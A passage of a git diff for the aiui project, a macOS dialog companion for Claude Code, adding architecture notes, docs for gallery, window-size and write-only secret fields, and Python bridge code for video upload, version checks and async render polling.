+  - Window chrome (title bar / header chip) shows `session` + `session_origin`.
+  - Fallback when the agent passes nothing: `session_origin` + short id.
+
+> **Multi-window implemented (2026-05-30, PR #137); tunnel settled, no change
+> needed** (see the empirical measurement above). The tunnel is already the
+> correct aiui-dedicated mechanism and adequately hardened; piggyback is
+> impossible (CD provides no forward). Step 4 is therefore complete bar the
+> optional verified-`/probe` health polish, which was assessed and declined as
+> marginal. (Note: aiui requires the user to register each remote manually in
+> its settings with a working non-interactive ssh alias — that is current,
+> intended behaviour, not a planned change; Claude Desktop does not expose its
+> Code-tab connections to a third-party app, so there is no clean way to
+> auto-discover them.)
+>
+> Multi-window itself is done, via a **pull model** rather than multiplying the
+> old emit/ack/ready handshake per window:
+> - `dialog.rs`: `try_register` (single-occupancy 409) → `register_dialog`
+>   (N concurrent, evict-oldest only at `DIALOG_HARD_CAP`); the request payload
+>   (spec + ttl + `session`/`session_origin`) is stored and pulled by id.
+>   `cancel_all` removed (per-id cancel only — a blunt drain would kill other
+>   sessions' live dialogs).
+> - `http.rs`: `POST /render` builds a **fresh window labelled by the dialog id**
+>   (`build_dialog_window`) and the whole emit/`dialog_window_ready`/ack-timeout/
+>   reload-retry/idle-restart machinery is gone — the window pulls its spec via
+>   `get_dialog_spec` on mount, so there's no event-before-listener race to
+>   guard. Teardown is per-id.
+> - `lib.rs`: `get_dialog_spec` command; per-id `destroy_dialog_window`;
+>   Accessory demote when no dialog window remains; X-close cancels only the
+>   closed window's own dialog; orphan-sweep is per-id.
+> - Frontend `DialogShell.svelte`: reads its window label (= id), pulls the
+>   spec, renders, and shows a fixed top-right **session chip** (`session` ·
+>   `session_origin`), hidden when neither is set.
+> - Bridges: `session` tool param on both (`mcp.rs`, `server.py`); the **Python
+>   bridge auto-injects `socket.gethostname()` as `session_origin`** (I8
+>   fallback for remotes sharing `:7777`).
+> - Tests: Rust 102, Python 26, svelte-check 0 errors. **GUI behaviour is not
+>   verifiable from the remote — needs validation on the Mac** (the
+>   integration harness below is the right home for it).
+
+## Cross-cutting — observability + test harness (makes "no regression" real)
+
+- Promote the ad-hoc trace into an explicit named lifecycle state machine +
+  event log (states: cold → serving → headless-idle → draining → exit(reason)).
+- **Integration test harness for the remote path** — the layer with zero
+  coverage today (only pure-function unit tests exist), which is *why* this has
+  been whack-a-mole. Scenarios it must exercise before each release:
+  tunnel-down, GUI-down-mid-call, update-mid-call, parallel sessions (same +
+  different remotes), Claude-Desktop-quit, Claude-Desktop-restart.
+
+  > **Design + Stufe 1 landed (2026-05-30):** see
+  > [`integration-harness.md`](./integration-harness.md). Established that the
+  > driver can run **from the remote against the real companion** over the
+  > tunnel. Stufe 1 (read-only smoke: `/ping` `/health` `/version` `/probe`,
+  > 401, unknown render-id) is implemented in
+  > `python/tests/test_integration_live.py` (opt-in `AIUI_LIVE=1`, skipped in
+  > normal/CI runs) and verified live (6 passed vs the installed companion).
+  > Stufe 2 (render path + window lifecycle) is designed: it needs a strictly
+  > test-gated companion hook to answer dialogs without a human / screen-spam,
+  > and the v0.5.0 build running on the Mac to validate this PR's behaviour.
+
+## Sequencing & no-regression guardrail
+
+Order: **1 → 2 → 3 → 4.** Each step is independently shippable and verifiable.
+Steps 1–3 deliver the bulk of the stability gain and do **not** depend on the
+tunnel decision.
+
+For every mechanism this plan retires (grace-exit, remote `pkill`,
+single-occupancy 409, and the dedicated tunnel if we choose piggyback): name the
+original incident it guarded against and show the new model covers it **before**
+deleting it. Each retired path was added for a real failure — the replacement
+must demonstrably subsume that failure.
+
+## Step 1 — implementation record (shipped under Refs #137)
+
+Files touched: `lifetime.rs`, `lib.rs`, `http.rs`, `src/lib/updater.ts`.
+
+Single exit authority is now real:
+
+```
+host_should_exit(explicit, cd_running) = explicit || !cd_running
+```
+
+`explicit` is an `ExitAuthority` latch (an `AtomicBool` in `lifetime.rs`,
+`manage`d in `lib.rs`) set only by `quit_app` (uninstall), the HTTP `/update`
+restart path (`http.rs`), and the frontend update-restart
+(`authorize_exit_for_update`, called from `updater.ts` before `relaunch()`).
+`cd_running` is `setup::is_claude_desktop_running()`. The predicate is a pure
+function and unit-tested.
+
+Wiring:
+
+- **`lifetime::make_shutdown_watcher`** — keeps the last-child-disconnect edge
+  as a *trigger only*. On the edge it arms a short grace (`SHUTDOWN_GRACE_SECS`,
+  now 5 s) and then decides via the pure `grace_outcome(child_returned,
+  cd_running)`: exit only if Claude Desktop is gone *and* no child returned;
+  otherwise stay. No continuous poll — one `pgrep` per edge.
+- **Setup-window `CloseRequested`** (`lib.rs`) — `api.prevent_close()` +
+  `window.hide()` + Accessory demote. The `setup-close-no-children →
+  app.exit(0)` path is gone.
+- **`RunEvent::ExitRequested`** (`lib.rs`) — default-deny: `api.prevent_exit()`
+  unless `host_should_exit`. The child-count / pending-dialog veto is gone.
+- **`LifetimeStats`** — counter retained for `/health` telemetry and the
+  `mcp_attach` start-trigger; it no longer reads into any exit decision.
+
+### Verification mini-harness (Step 2 of the work order)
+
+Pure decision functions are unit-tested in `lifetime.rs` so both invariants are
+asserted without a live Claude Desktop or a running Tauri app — exactly the two
+facts the runtime reads:
+
+- `child_flap_with_claude_desktop_alive_stays` — `grace_outcome(false, true) =
+  Stay`: the host survives a child flap while CD runs (the case the old 60 s
+  grace got wrong).
+- `claude_desktop_quit_with_no_child_exits` — `grace_outcome(false, false) =
+  Exit`: the host follows the Wirt on CD-quit.
+- `host_*` tests pin the three legitimate exits (uninstall, update, CD-gone).
+
+### Prove-then-delete (Step 3 of the work order)
+
+| Retired path | Original incident it guarded | New model that subsumes it |
+|---|---|---|
+| `grace-expired` (60 s after last child, child-count gated) | reap stale state when "nobody needs aiui" | the only legitimate "nobody needs us" signal is **Wirt gone** → `claude-desktop-gone` exit. Stale-binary / multi-instance reaping stays via `disk_version_if_stale` + housekeeping sweeps (untouched). The 60 s-on-child-count exit *was itself the bug* — it killed the host during Cowork churn / MCP re-spawn while CD was alive. |
+| `setup-close-no-children → app.exit(0)` | let the app get out of the way when the user closed Settings and no children were attached (Issue #72 lineage) | I2: window close = hide + Accessory demote. The host stays headless with its Wirt; the Dock icon is dropped so "getting out of the way" no longer needs process death. Truly removing aiui is uninstall (`quit_app`, explicit). |
+| `tauri-exit-requested-no-attached` (veto-by-child-count) | 0.4.42 lost the GUI ~18 ms after every dialog submit via Tauri's last-window-close ExitRequested; 0.4.44 added a child-count veto | default-deny `host_should_exit`: every Tauri-initiated exit is vetoed unless explicit uninstall/update or CD gone. The post-submit last-window-close exit is now unconditionally vetoed (CD alive, not explicit) → host survives. Child count no longer participates. |
+
+### One deliberate deviation from the spec's prose
+
+The spec text says "CD alive → **do not arm grace**". The implementation arms
+the 5 s grace on *every* last-child-disconnect edge and gates the *exit* on a
+fresh `is_claude_desktop_running()` probe at expiry. This is functionally
+identical for the churn case (grace expires into `Stay`) but closes a race the
+literal wording leaves open: if the edge fires while CD is mid-quit and `pgrep`
+still matches a terminating helper, a "skip grace if CD looks alive" shortcut
+would `Stay` with no further edge to re-trigger — stranding the host alive after
+its Wirt is gone, a Step-2 ("host exits on CD-quit") regression. Invariant I1 is
+preserved exactly: the exit is gated on `!is_claude_desktop_running()`; CD-alive
+never exits.
diff --git a/docs/architecture/video-transfer.md b/docs/architecture/video-transfer.md
new file mode 100644
index 0000000..5e68854
--- /dev/null
+++ b/docs/architecture/video-transfer.md
@@ -0,0 +1,91 @@
+# Video transfer (media cache)
+
+Status: implemented in v0.7.0.
+
+## Problem
+
+The gallery/form widgets can show video. Three constraints collide:
+
+1. **data: doesn't scale.** Inlining a clip as `data:video/...;base64` is
+   ~33 % larger than the file and lands in the render spec — it chokes the
+   `get_dialog_spec` IPC and pins that much memory in the dialog registry.
+   The image resolvers cap inlining at 10 MB precisely to avoid this.
+2. **The Mac can't read a remote file.** For an SSH-tunneled session the
+   agent (and its files) live on the remote. The companion runs on the Mac.
+3. **There is no Mac → remote channel.** aiui owns a single SSH **reverse**
+   tunnel, `ssh -N -T -R 7777:localhost:7777`, established Mac-side. Claude
+   Desktop provides no forward (verified empirically, 2026-05-30). So the
+   Mac cannot `scp`/pull from the remote — the only path is remote → Mac.
+
+## Design: push over the existing :7777 channel
+
+The bridge runs on whichever host holds the file. It **pushes** the bytes to
+the companion and gets back a playback URL:
+
+```
+bridge ──POST /media (bytes, ?ext=mp4, bearer)──▶ companion
+                                                  stores <uuid>.mp4 in cache
+       ◀── { url: http://127.0.0.1:7777/media/blob/<uuid>.mp4, ttl_secs } ──
+```
+
+Playback: the dialog WebView loads that URL. `GET /media/blob/<file>` is
+served by `tower_http::services::ServeDir` (HTTP range support → video
+seeking), **unauthenticated** — the filename is a v4 UUID, an unguessable
+capability, and the server binds loopback (+ the user's own reverse tunnel).
+Uploads require the bearer token like every other mutating endpoint.
+
+### Why the same URL works on both ends
+
+The reverse tunnel maps `remote:7777 → mac:7777`. The companion's own HTTP
+server *is* `mac:7777`. So `http://127.0.0.1:7777/media/blob/<id>` resolves
+to the companion from the remote (where the bridge POSTed it) **and** from
+the Mac (where the WebView plays it). No host rewriting, no per-side URL.
+
+### Where it runs
+
+- **Local Mac session** → the bundled Rust bridge (`aiui --mcp-stdio`) reads
+  the file and POSTs over loopback. Ships in the app; works as soon as the
+  user updates.
+- **Remote session** → the Python bridge (`uvx aiui-mcp`) reads the remote
+  file and POSTs over the tunnel. Requires the PyPI release to be promoted
+  (the validate-first pre-release flow does not publish to PyPI).
+
+Both detect a local video by extension (`.mp4/.mov/.m4v/.webm`), upload
+*before* the image inliner runs (so it never base64s a video), and swap the
+`src`/`thumbnail` for the returned URL. `http(s)://` video URLs are left
+alone and streamed directly by the WebView (CSP `media-src` allows `https:`).
+
+## Cache lifecycle
+
+`companion/src-tauri/src/media.rs`. Cache dir: `<app-cache-dir>/media`.
+
+- **Per-file TTL** = 2 h (matches the dialog TTL — a clip is only needed
+  while its dialog is open).
+- **Total-size cap** = 1 GiB, oldest-first eviction.
+- **Per-upload cap** = 512 MiB (enforced at the HTTP body limit + handler).
+- Swept on every upload and once at startup. The cache is disposable: a
+  missing file renders as a broken `<video>`, never a crash, so eviction is
+  best-effort and never blocks a render.
+
+## CSP
+
+`media-src` was absent (fell back to `default-src 'self'`, which blocked the
+loopback origin). Added:
+
+```
+media-src 'self' data: blob: http://127.0.0.1:* http://localhost:* https:
+connect-src … http://127.0.0.1:* http://localhost:*
+```
+
+`127.0.0.1` is a potentially-trustworthy origin (W3C secure-contexts), so
+WebKit permits the loopback http media subresource from the app's secure
+origin without a mixed-content block.
+
+## Failure modes (all non-fatal)
+
+| Condition | Result |
+|---|---|
+| File unreadable on the bridge host | path left as-is; logged; broken player |
+| Upload > 512 MiB | companion returns 413; path left as-is |
+| Old companion without `/media` (404) | path left as-is; falls back to inline (fails >10 MB) |
+| Cache file evicted before playback | broken `<video>`; re-render to re-push |
diff --git a/docs/skill.md b/docs/skill.md
index 8a3107f..16f994d 100644
--- a/docs/skill.md
+++ b/docs/skill.md
@@ -65,6 +65,7 @@ Skip the dialog for content the user reads, doesn't answer:
 | Pick one of N images ("A or B or C") | `ask` with `thumbnail` per option |
 | Multi-field input, multi-action footer | `form` |
 | Pick one of *many* images (e.g. 12 logo variants) | `form` with `image_grid` |
+| Per-item verdict on a *batch* of images/videos ("approve/revise/skip each") | `gallery` |
 | Single free-text answer | just ask in chat |
 | More than 8 fields | split into multiple `form` calls; do not cram one dialog |
 
@@ -237,6 +238,55 @@ thumbnail candidates, asset triage. Spec: `images: [{value, src, label?}]`,
 `multi_select?`, `columns?` (default 3). Result: `{selected: [values]}`.
 Each `src` follows the same rules as `image` — see below.
 
+`image_grid` is a *picker* — one (or N) selected out of many. When you
+instead need a **separate verdict per item** — approve this, revise that,
+skip the third, with an optional note each — use the `gallery` tool below.
+
+## Batch review: `gallery`
+
+A standalone tool (not a `form` field), for reviewing a *batch* of images
+and/or videos and collecting one decision per item in a single window —
+instead of firing `confirm` once per asset.
+
+Spec: `items: [{value, src?, label?, detail?, max_height?}]`,
+`actions?` (per-item buttons, default Approve / Revise / Skip),
+`comment?` (free-text field per item), `columns?` (default responsive).
+Each item's `value` must be non-empty and unique — it keys the result.
+`src` follows the same resolution rules as `image`; **videos** (a
+`data:video/` URL, an `http(s)://` URL, or a local `.mp4`/`.mov`/`.m4v`/
+`.webm` path) render with native `<video controls>`. Local video files of
+any size work: the bridge pushes them to aiui's media cache on the Mac and
+the dialog streams them back (range-seekable), so a remote agent's clip
+plays without you hosting it anywhere. `http(s)://` video URLs stream
+directly.
+
+Result: `{cancelled, decisions: {"<item value>": {decision, comment?}}}`.
+Only items the user actually touched appear in `decisions` — an untouched
+item means "no verdict", not a default.
+
+Use `gallery` for "review these 6 hero renders", "triage this screenshot
+batch". Use `confirm`+`image` for a single yes/no sign-off, and
+`ask`+`thumbnail` / `image_grid` when the task is *picking* among
+candidates rather than judging each one.
+
+## Starting window size: `size` / `width` / `height`
+
+`form` and `gallery` accept an optional **`size`** hint — `"s"`, `"m"`, or
+`"l"` — and aiui picks good local defaults for each, clamped to the user's
+screen. (Power users can pass explicit `width` / `height` in logical px,
+which override `size`; rarely needed.)
+
+The hint is a **floor, not a cap**: the window opens at
+`max(content-estimate, hint)`. So a content-heavy dialog never opens
+smaller than it needs (you can't cram a 12-image gallery with `size:"s"`),
+but a *sparse* dialog you know will feel cramped at the default can be told
+to start roomy. Windows are always resizable regardless — but many users
+don't realise that, so a dialog that opens at a comfortable size is the
+difference between "looks polished" and "looks broken". Reach for `"m"` or
+`"l"` when a form carries images, tables, wireframes, or many fields, or a
+gallery has a large batch / tall thumbnails. Leave it unset for ordinary
+short forms — the auto-estimate already fits those.
+
 ## Image sources (`src` / `thumbnail`)
 
 aiui takes an image source in five places:
@@ -337,8 +387,48 @@ recordings or to a shoulder-surfer.
 
 Be honest with the user, though — the value still returns to you as
 plaintext in the tool response. For long-lived or high-value secrets,
-tell the user to put them in their keychain or an env var and reference
-them by name instead.
+use the `secret` field with a `target` instead (below) so the value
+never enters the conversation.
+
+## Secrets & file-write: the `secret` field + `target` (#135)
+
+When a value must NOT pass through this conversation — a credential the
+user pastes that should land in a file, not your transcript — use a
+`secret` field with a `target`. Any input field may carry `target`; for a
+`secret` field the value is **write-only**: aiui writes it to the file and
+returns only `{written, target, bytes}`, never the value.
+
+```json
+{ "kind": "secret", "name": "pat", "label": "GitHub PAT für byte5ai",
+  "target": { "mode": "create", "path": "~/.github_tokens/byte5ai",
+              "perm": "0600", "overwrite": true } }
+```
+
+- **`mode: "create"`** — write the raw value. Needs `overwrite: true` to
+  replace an existing file (a path typo otherwise fails loudly rather than
+  clobbering).
+- **`mode: "substitute"`** — replace a `placeholder` that occurs *exactly
+  once* in an existing file (format-agnostic: YAML/TOML/INI/env). 0 or >1
+  matches → error, never a partial or wrong write. **Pick a distinctive
+  sentinel** that cannot collide with real file content — e.g.
+  `__AIUI_SECRET_GITHUB_PAT__`, never a common word like `TOKEN` or `X`. The
+  exactly-once rule is the safety net (a colliding placeholder errors instead
+  of being misapplied), but a distinctive sentinel makes the match
+  unambiguous in the first place.
+- **Destination is always your own host** — an aiui module already runs
+  there (the native app for a local session, the bridge on a remote SSH
+  session), and it performs the write as a plain **local** file operation.
+  So `create` and `substitute` behave identically local and remote (the
+  entered value reaches that module over aiui's own channel, never via the
+  agent). You cannot target a foreign host; the user sees the resolved path
+  and approves it by submitting.
+- **Errors** come back as `{written:false, error}` — no silent success.
+
+Why it exists: it replaces the fragile "guess a shell one-liner to stash a
+token" pattern with a native dialog + a correct, atomic write whose target
+the user sees first. It's a QoL + confused-deputy guard, **not** a hard
+guarantee the agent can't read the value some other way — for that, the
+user still types it themselves outside any agent path.
 
 ## Anti-patterns (slop vs. clean)
 
diff --git a/python/pyproject.toml b/python/pyproject.toml
index dc3a86a..14ee5e9 100644
--- a/python/pyproject.toml
+++ b/python/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "aiui-mcp"
-version = "0.4.46"
+version = "0.8.1"
 description = "MCP server for aiui — native macOS dialogs from any Claude Code session, local or remote."
 readme = "README.md"
 requires-python = ">=3.10"
diff --git a/python/src/aiui_mcp/server.py b/python/src/aiui_mcp/server.py
index da93fae..f61985d 100644
--- a/python/src/aiui_mcp/server.py
+++ b/python/src/aiui_mcp/server.py
@@ -16,19 +16,23 @@
 """
 from __future__ import annotations
 
+import asyncio
 import base64
 import importlib.metadata
 import importlib.resources as resources
 import logging
 import mimetypes
 import os
+import socket
 import sys
+import tempfile
+import time
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any
 
 import httpx
-from mcp.server.fastmcp import FastMCP
+from mcp.server.fastmcp import Context, FastMCP
 
 
 def _version() -> str:
@@ -80,6 +84,28 @@ def _default_token_path() -> str:
 TIMEOUT_S = float(os.environ.get("AIUI_TIMEOUT_S", "120"))
 HEALTH_TIMEOUT_S = float(os.environ.get("AIUI_HEALTH_TIMEOUT_S", "3"))
 
+# Cooperative version floor (Step 2). The wire contract between this bridge and
+# the Mac companion is versioned independently of either side's release version.
+# This bridge speaks wire v1; if the companion reports a *different*
+# wire_version we surface a structured "restart this session" tool error rather
+# than letting the Mac kill us to force a version. Ordinary app-version skew is
+# tolerated — only an incompatible wire_version is fatal. Checked once per
+# process (memoised in `_wire_checked`).
+EXPECTED_WIRE_VERSION = 1
+_wire_checked = False
+
+# Cold-start poll (Step 3, bridge parity with the Rust bridge's wait_for_aiui).
+# Before the first render call we poll the unauthenticated /ping until the
+# companion answers or this budget elapses — so a freshly-launched Claude
+# Desktop / just-up SSH tunnel gets time to start serving instead of failing
+# the first call. Replaces the brittle single 3 s /health preflight.
+COLDSTART_WAIT_S = float(os.environ.get("AIUI_COLDSTART_WAIT_S", "30"))
+
+# Per-GET timeout for the async-render poll. Must exceed the companion's
+# ~25 s server-side poll window so the server always answers `{pending:true}`
+# before we time out, letting us re-poll cleanly.
+ASYNC_POLL_TIMEOUT_S = 40.0
+
 _INSTRUCTIONS = """\
 aiui is connected — you can render native dialogs on the user's Mac \
 instead of asking via chat. Default behaviour for this session:
@@ -152,6 +178,20 @@ async def _preflight() -> None:
                 f"local aiui instance holding the port. Run `pkill -f '^aiui$'` on "
                 f"this host. ({_explain_exc(e)})"
             ) from e
+        except httpx.ReadError as e:
+            # Connected at the TCP layer but the stream closed with no HTTP
+            # response — the classic remote signature of "tunnel is up but the
+            # Mac side isn't serving" (stale SSH reverse-forward bound to :7777
+            # with a dead aiui behind it). Distinct from ConnectError (nothing
+            # listening) and from a clean 401/5xx.
+            raise RuntimeError(
+                f"aiui companion at {ENDPOINT} accepted the connection but sent no "
+                f"response (ReadError). On a remote this means the SSH reverse-tunnel "
+                f"is up but the Mac-side aiui isn't serving — Claude Desktop may be "
+                f"closed, or a stale tunnel is squatting :7777. Open Claude Desktop on "
+                f"the Mac; if it persists, re-register this remote in aiui.app settings. "
+                f"({_explain_exc(e)})"
+            ) from e
         except httpx.RemoteProtocolError as e:
             # Connection reset / closed mid-response. The on-Mac mcp-stdio
             # child's auto-resurrect normally brings aiui.app back on the
@@ -195,6 +235,50 @@ async def _preflight() -> None:
                 f"aiui companion /health returned {r.status_code}: {r.text[:200]}"
             )
 
+        # Cooperative version floor (Step 2): once per process, confirm the
+        # companion speaks a compatible wire version. Reuses this client.
+        await _check_wire_compat(client)
+
+
+async def _check_wire_compat(client: httpx.AsyncClient) -> None:
+    """One-time wire-compatibility check against the companion's `/version`.
+
+    Raises a structured ``RuntimeError`` (surfaced to the agent as a tool error)
+    on a hard wire-version mismatch, telling the user to restart this Claude
+    Code session so it respawns ``aiui-mcp`` at a matching version — the
+    cooperative replacement for the Mac externally killing this bridge.
+
+    Tolerant by design: a companion too old to report ``wire_version`` (field
+    absent → treated as v1), or any transient error reading ``/version``, does
+    NOT block — we only hard-fail on an explicit, incompatible ``wire_version``.
+    Memoised via the module-level ``_wire_checked`` so it costs one extra GET
+    per process, on the first render only.
+    """
+    global _wire_checked
+    if _wire_checked:
+        return
+    try:
+        r = await client.get(
+            f"{ENDPOINT}/version",
+            headers={"Authorization": f"Bearer {_token()}"},
+        )
+        r.raise_for_status()
+        remote_wire = int(r.json().get("wire_version", EXPECTED_WIRE_VERSION))
+    except Exception as e:  # noqa: BLE001 — tolerate skew; never block on a read error
+        log.debug("wire-compat check skipped (could not read /version): %s", _explain_exc(e))
+        _wire_checked = True
+        return
+    if remote_wire != EXPECTED_WIRE_VERSION:
+        # Do NOT memoise a failure — leave it un-set so a subsequent call
+        # (e.g. after the user restarts the companion) re-checks cleanly.
+        raise RuntimeError(
+            f"incompatible aiui versions — this bridge (aiui-mcp {VERSION}) speaks wire "
+            f"v{EXPECTED_WIRE_VERSION}, but the companion on your Mac speaks wire "
+            f"v{remote_wire}. Restart this Claude Code session so it respawns aiui-mcp at "
+            f"a matching version (or update the side that is behind)."
+        )
+    _wire_checked = True
+
 
 _SRC_KEYS = {"src", "thumbnail"}
 _MAX_IMAGE_BYTES = 10 * 1024 * 1024  # 10 MB — mirrors the Rust resolver
@@ -268,26 +352,315 @@ def _resolve_local_paths(node: Any) -> None:
             _resolve_local_paths(item)
 
 
-async def _post_render(spec: dict[str, Any]) -> dict[str, Any]:
+_VIDEO_EXTS = (".mp4", ".mov", ".m4v", ".webm")
+
+
+def _is_local_video(s: str) -> bool:
+    """A local-filesystem path pointing at a video by extension. Mirrors
+    `is_local_video_path` in the Rust bridge and `isVideo` in Gallery.svelte.
+    """
+    if not _looks_like_local_path(s):
+        return False
+    stem = s.lower().split("?", 1)[0].split("#", 1)[0]
+    return stem.endswith(_VIDEO_EXTS)
+
+
+def _collect_local_videos(node: Any, out: list[str]) -> None:
+    """Gather distinct local video paths from every `src`/`thumbnail` slot."""
+    if isinstance(node, dict):
+        for key, value in node.items():
+            if key in _SRC_KEYS and isinstance(value, str) and _is_local_video(value):
+                if value not in out:
+                    out.append(value)
+            else:
+                _collect_local_videos(value, out)
+    elif isinstance(node, list):
+        for item in node:
+            _collect_local_videos(item, out)
+
+
+def _replace_srcs(node: Any, mapping: dict[str, str]) -> None:
+    """Swap `src`/`thumbnail` strings that are keys in `mapping`."""
+    if isinstance(node, dict):
+        for key, value in list(node.items()):
+            if key in _SRC_KEYS and isinstance(value, str) and value in mapping:
+                node[key] = mapping[value]
+            else:
+                _replace_srcs(value, mapping)
+    elif isinstance(node, list):
+        for item in node:
+            _replace_srcs(item, mapping)
+
+
+async def _upload_local_videos(spec: dict[str, Any], client: httpx.AsyncClient) -> None:
+    """Push local video files to the companion's `/media` cache and rewrite
+    their `src`/`thumbnail` to the returned loopback playback URL.
+
+    Videos are too big to inline as `data:` (the 10 MB cap + base64 bloat),
+    and a remote agent's file isn't readable from the Mac — so the bridge
+    streams the bytes over the same :7777 channel the render uses (loopback
+    locally, reverse tunnel remotely). Best-effort: a read error, a 413, or
+    an old companion without `/media` (404) leaves the path untouched, and
+    `_resolve_local_paths` then does whatever it can with it.
+    """
+    paths: list[str] = []
+    _collect_local_videos(spec, paths)
+    if not paths:
+        return
+    mapping: dict[str, str] = {}
+    for p in paths:
+        try:
+            data = Path(p).expanduser().read_bytes()
+        except OSError as e:
+            log.warning("video skipped (read failed) %s: %s", p, e)
+            continue
+        ext = p.lower().split("?", 1)[0].split("#", 1)[0].rsplit(".", 1)[-1] or "mp4"
+        try:
+            r = await client.post(
+                f"{ENDPOINT}/media",
+                params={"ext": ext},
+                headers={
+                    "Authorization": f"Bearer {_token()}",
+                    "Content-Type": "application/octet-stream",
+                },
+                content=data,
+            )
+            r.raise_for_status()
+            url = r.json().get("url")
+        except (httpx.HTTPError, ValueError) as e:
+            log.warning("video upload failed %s: %s", p, e)
+            continue
+        if url:
+            mapping[p] = url
+    _replace_srcs(spec, mapping)
+
+
+def _collect_target_fields(spec: dict[str, Any]) -> list[dict[str, Any]]:
+    """Form fields carrying a non-null `target` (#135), from flat `fields` and
+    any `tabs[].fields`."""
+    out: list[dict[str, Any]] = []
+
+    def scan(fields: Any) -> None:
+        if isinstance(fields, list):
+            for f in fields:
+                if isinstance(f, dict) and f.get("target") is not None and isinstance(f.get("name"), str):
+                    out.append(f)
+
+    scan(spec.get("fields"))
+    for tab in spec.get("tabs") or []:
+        if isinstance(tab, dict):
+            scan(tab.get("fields"))
+    return out
+
+
+def _write_local_target(value: str, target: dict[str, Any]) -> dict[str, Any]:
+    """Mirror of the Rust `filewrite::write_local`: a LOCAL file write on THIS
+    host (the bridge runs where the agent runs, so the file is always local).
+    `create` (atomic tmp+rename, refuses clobber without overwrite) or
+    `substitute` (replace a placeholder occurring exactly once). Never logs the
+    value. Returns `{written, target, bytes, error?}`.
+    """
+    raw_path = str(target.get("path", ""))
+    if not raw_path or any(ord(c) < 0x20 or ord(c) == 0x7f for c in raw_path):
+        return {"written": False, "target": raw_path, "bytes": 0, "error": "invalid target path"}
+    path = Path(raw_path).expanduser()
+    display = str(path)
+    mode = target.get("mode")
+    perm_s = target.get("perm")
+    try:
+        perm = int(str(perm_s), 8) if perm_s else 0o600
+    except ValueError:
+        perm = 0o600
+
+    def atomic_write(p: Path, data: bytes) -> None:
+        p.parent.mkdir(parents=True, exist_ok=True)
+        fd, tmp = tempfile.mkstemp(prefix=".aiui-write-", dir=str(p.parent))
+        try:
+            os.fchmod(fd, perm)
+            with os.fdopen(fd, "wb") as f:
+                f.write(data)
+            os.replace(tmp, p)
+        except BaseException:
+            try:
+                os.unlink(tmp)
+            except OSError:
+                pass
+            raise
+
+    try:
+        if mode == "create":
+            if path.exists() and not target.get("overwrite"):
+                return {"written": False, "target": display, "bytes": 0,
+                        "error": "file exists and overwrite is false (mode: create)"}
+            atomic_write(path, value.encode())
+            return {"written": True, "target": display, "bytes": len(value.encode())}
+        if mode == "substitute":
+            placeholder = target.get("placeholder")
+            if not placeholder:
+                return {"written": False, "target": display, "bytes": 0,
+                        "error": "substitute mode requires 'placeholder'"}
+            existing = path.read_text()
+            count = existing.count(placeholder)
+            if count != 1:
+                return {"written": False, "target": display, "bytes": 0,
+                        "error": (f"placeholder '{placeholder}' not found in target file"
+                                  if count == 0
+                                  else f"placeholder '{placeholder}' found {count}× (must be exactly 1)")}
+            updated = existing.replace(placeholder, value, 1)
+            atomic_write(path, updated.encode())
+            return {"written": True, "target": display, "bytes": len(updated.encode())}
+        return {"written": False, "target": display, "bytes": 0, "error": f"unknown mode '{mode}'"}
+    except OSError as e:
+        return {"written": False, "target": display, "bytes": 0, "error": str(e)}
+
+
+def _apply_target_writes(spec: dict[str, Any], data: dict[str, Any]) -> None:
+    """After a render returns, perform the local file writes for `target`
+    fields on THIS host and fold the outcomes back into the result, stripping
+    raw `secret` values so they never reach the agent. No-op on cancel or when
+    no field carries a target. Mutates `data` in place.
+    """
+    if data.get("cancelled"):
+        return
+    targets = _collect_target_fields(spec)
+    if not targets:
+        return
+    values = data.setdefault("result", {}).setdefault("values", {})
+    for field in targets:
+        name = field["name"]
+        v = values.get(name)
+        outcome = _write_local_target("" if v is None else str(v), field["target"])
+        if field.get("kind") == "secret":
+            values[name] = outcome  # write-only: raw value never returned
+        else:
+            values[name] = {"value": v, **outcome}
+
+
+async def _wait_for_aiui() -> None:
+    """Poll the unauthenticated `/ping` until the companion answers or
+    `COLDSTART_WAIT_S` elapses (Step 3, parity with the Rust bridge).
+
+    Gives a cold companion (Claude Desktop just launched, SSH tunnel just came
+    up) time to start serving before the first render, instead of failing the
+    call outright. Tolerant: on timeout we simply fall through to `_preflight`,
+    which produces the precise reachability diagnosis. `/ping` is cheap and
+    needs no token, so this is a light readiness gate, not a full health check.
+    """
+    deadline = time.monotonic() + COLDSTART_WAIT_S
+    async with httpx.AsyncClient(timeout=2.0) as client:
+        while time.monotonic() < deadline:
+            try:
+                r = await client.get(f"{ENDPOINT}/ping")
+                if r.status_code == 200:
+                    return
+            except httpx.HTTPError:
+                pass  # not up yet — keep polling within the budget
+            await asyncio.sleep(0.5)
+
+
+async def _poll_render(
+    client: httpx.AsyncClient,
+    render_id: str,
+    ctx: Context | None,
+) -> dict[str, Any]:
+    """Poll `GET /render/{id}` until the terminal result (Step 3 async render).
+
+    Each GET is bounded by `ASYNC_POLL_TIMEOUT_S` (> the server's ~25 s poll
+    window), so the server always answers `{pending:true}` before we time out
+    and we re-poll — no single connection is held for the user's think-time,
+    which is what immunises the remote path against the multi-minute-ReadError
+    class. Emits an MCP progress notification each pending iteration so the
+    client (Claude Code) knows the tool is alive, not hung.
+    """
+    poll_url = f"{ENDPOINT}/render/{render_id}"
+    iteration = 0
+    while True:
+        pr = await client.get(
+            poll_url,
+            headers={"Authorization": f"Bearer {_token()}"},
+            timeout=ASYNC_POLL_TIMEOUT_S,
+        )
+        if pr.status_code == 404:
+            raise RuntimeError(
+                f"aiui lost track of render {render_id} (expired or never "
+                f"registered). Restart the dialog."
+            )
+        pr.raise_for_status()
+        pv = pr.json()
+        if pv.get("pending") is True:
+            iteration += 1
+            if ctx is not None:
+                # Best-effort: a missing progressToken or any reporting hiccup
+                # must never break the render.
+                try:
+                    await ctx.report_progress(progress=float(iteration), total=None)
+                except Exception as e:  # noqa: BLE001
+                    log.debug("progress report skipped: %s", _explain_exc(e))
+            continue
+        return pv
+
+
+def _session_origin() -> str:
+    """This bridge's host, auto-attached to every render as `session_origin`
+    (Step 4, I8). The Mac can't tell remotes apart at the shared `:7777`, so
+    the origin must come from the caller side — the user always sees which host
+    a dialog came from even when the agent passes no `session` label."""
+    try:
+        return socket.gethostname()
+    except OSError:
+        return "remote"
+
+
+async def _post_render(
+    spec: dict[str, Any],
+    ctx: Context | None = None,
+    session: str | None = None,
+) -> dict[str, Any]:
+    await _wait_for_aiui()
     await _preflight()
     t0 = datetime.now(timezone.utc)
